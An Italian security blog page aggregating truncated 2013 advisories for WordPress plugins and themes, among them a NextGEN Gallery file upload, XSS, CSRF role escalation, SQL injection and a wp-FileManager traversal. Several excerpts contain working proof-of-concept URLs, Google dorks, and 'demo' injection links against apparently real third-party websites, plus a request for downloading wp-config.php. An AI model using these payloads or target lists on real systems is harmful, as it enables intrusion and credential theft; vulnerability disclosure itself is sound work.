WordPress NextGEN Gallery 1.9.12 Shell Upload

15 giugno 2013 - Fonte: http://www.mondounix.com 
##############################################################
 
 
                      - S21Sec Advisory -
 
 
##############################################################
 
     Title:   NextGEN Gallery 1.9.12 Arbitrary File Upload
        ID:   S21SEC-046-en
    CVE ID:   CVE-2013-3684
  Severity:   High
    Status:   Fixed
   History:   27.May.2013 Vulnerability discovered
              28.May.2013 Vendor informed
              12.Jun.2013 Fix released
    Authors:  Marcos Agüero (maguero@s21sec.com)
       URL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt
   Release:   Public
 
 
[ SUMMARY ]
 
NextGEN Gallery is a WordPress gallery plugin that offers sophisticated...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , ,

WordPress Ambience Cross Site Scripting

10 giugno 2013 - Fonte: http://www.mondounix.com 
#####################################
Title:Xss In wordpress ambience theme
#####################
 
#Author:Darksnipper & Soul~Inj3ctor
 
#Email:Darksnipper@live.com
 
#####################################
#Home:-   www.MadLeeTs.com
#####################################
 
Theme Link:-Google About It :D
 
 
 
######################################################################
#P.o.c
 
http: //127.0.0.1/wp-content/themes/ambience/thumb.php?src=<body
onload=alert(/darksnipper/)>.jpg
 
 
 
Greetz:Dream.killer,Soul~inj3ct0r,Error
Haxor,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,M4DSh4k,HaXor
KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k
Command3r,Pain006,Anon...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , ,

WordPress User Role Editor 3.12 Cross Site Request Forgery

29 maggio 2013 - Fonte: http://www.mondounix.com 
# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet
 
Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13
 
Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.
 
http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , ,

WordPress XSS and FPD vulnerabilities in I Love It New theme

26 maggio 2013 - Fonte: http://www.mondounix.com 
 
-------------------------
Affected products:
-------------------------
 
All versions of I Love It New theme for WordPress. The theme contains vulnerable versions of VideoJS and Audio Player.
 
 
Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read in repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to last version of VideoJS.swf.
 
 
-------------------------
Affected vendors:
-------------------------
 
CosmoThemes
http://cosmothemes.com
 
----------
Details:
----------
 
Cross-Site...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , , , ,

WordPress Spider Catalog Multiple Vulnerabilities

22 maggio 2013 - Fonte: http://www.mondounix.com 
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
 
Vulnerable is current version 1.4.6, older versions...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , , , , , , ,

WordPress Spider Event Calendar Multiple Vulnerabilities

22 maggio 2013 - Fonte: http://www.mondounix.com 
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.
 
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
 
Vulnerable...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , , , , , , ,

WordPress Flagallery-Skins SQL Injection

22 maggio 2013 - Fonte: http://www.mondounix.com 
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
#...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , ,

WordPress ProPlayer Plugin SQL Injection

21 maggio 2013 - Fonte: http://www.mondounix.com 
##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27
#
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27
#
#...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , ,

WordPress wp-FileManager File Download

16 maggio 2013 - Fonte: http://www.mondounix.com 
Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application
 
 
 
Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , ,

WordPress Newsletter 3.2.6 Cross Site Scripting

16 maggio 2013 - Fonte: http://www.mondounix.com 
Wordpress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability
 
 
Vendor: Stefano Lissa
Product web page: http://wordpress.org/extend/plugins/newsletter/
Affected version: 3.2.6 and bellow
 
Summary: Newsletter is the perfect WordPress plugin for creating
real newsletters and mail marketing system on your WordPress blog.
 
Desc: The plugin suffers from a XSS issue due to a failure to properly
sanitize user-supplied input to the 'alert' GET parameter in the 'page.php'
script. Attackers can exploit this weakness to execute arbitrary HTML
and script code in a user's browser session.
 
 
=======================================================================
/subscription/page.php:
-----------------------
 
70:...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , ,